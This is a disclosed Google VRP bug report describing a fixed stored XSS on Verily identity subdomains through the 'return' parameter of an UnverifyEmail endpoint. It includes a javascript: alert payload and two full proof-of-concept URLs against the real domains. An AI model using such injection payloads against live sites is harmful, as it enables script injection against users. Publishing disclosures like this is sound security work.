Skip to Content (Press Enter)
Google
Bug Hunters
Stored XSS on https://identity-dev.api.verily.com/
Reported by:
vijay kumar
Google VRP
accepted
17:38 | Apr 20, 2023
fixed
14:10 | Apr 30, 2023
reward decided
$100
Summary:
Stored XSS on
https://identity-dev.api.verily.com/
Product:
verily.com
URL:
https://identity-dev.api.verily.com
Vulnerability type:
Cross-site scripting (XSS)
Details
While testing verily.com subdomains i came across domain
https://identity-dev.api.verily.com/
which is used for authentication and identity verification. I found Stored XSS on this domain.
I have found this stored XSS in 2 different domains .
Description :
When you go to
https://ciam-email-verification.api.verily.com
and authenticate yourself , you will see option of "Unverify your email" . When you click on it , It will send a request in background which looks like below.
https://identity-dev.api.verily.com/UnverifyEmail?id=ciam%3Av1%3Aauth0%7C643daac39c44a90a5eefbe48&return=%2F
Here "return" post parameter is vulnerable to XSS Attack.
Payload used :
javascript:alert(document.domain)
Vulnerable Domains :
https://identity-dev.api.verily.com
https://identity-playground.api.verily.com
Final Stored XSS POC :
https://identity-dev.api.verily.com/UnverifyEmail?id=ciam%3Av1%3Aauth0%7C643daac39c44a90a5eefbe48&return=javascript:alert(document.domain)
Same works on domain
https://identity-playground.api.verily.com
too.
https://identity-playground.api.verily.com/UnverifyEmail?id=ciam%3av1%3aauth0%7c642521a63d40e99271e1c97d&return=javascript:alert(document.domain)
Both the XSS works on both Authenticated and Unauthenticated Accounts.
Attack scenario
Stored XSS.
登录
使用 Google 账号登录